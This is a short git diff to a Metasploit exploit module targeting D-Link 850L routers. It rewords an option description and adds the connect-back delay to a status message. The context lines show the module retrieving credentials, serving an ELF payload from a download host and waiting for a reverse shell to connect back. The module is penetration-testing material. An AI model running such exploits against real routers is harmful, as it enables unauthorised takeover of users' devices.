diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index cd6cc8f7ad..cd8fe1b141 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -51,10 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote OptAddress.new('DOWNHOST', [ false, 'An alternative host to requst the ARMLE payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [ true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), - OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to attacker', 10]) + OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to listener', 10]) ]) end - + def check begin res = send_request_cgi({ @@ -218,13 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote def exploit - print_status("#{peer} - Connecting to target...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") end - # # Information Retrieval, obtains creds and logs in # @@ -336,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote # Waits for shell to connect back to us, otherwise server stops and nothing is returned # def wait_for_connect - print_status("#{peer} - Waiting for shell to connect back to us...") + print_status("#{peer} - Waiting #{datastore['CONNECTBACK_DELAY'].to_s} seconds for shell to connect back to us...") waited = 0 while (@elf_sent) select(nil, nil, nil, 1)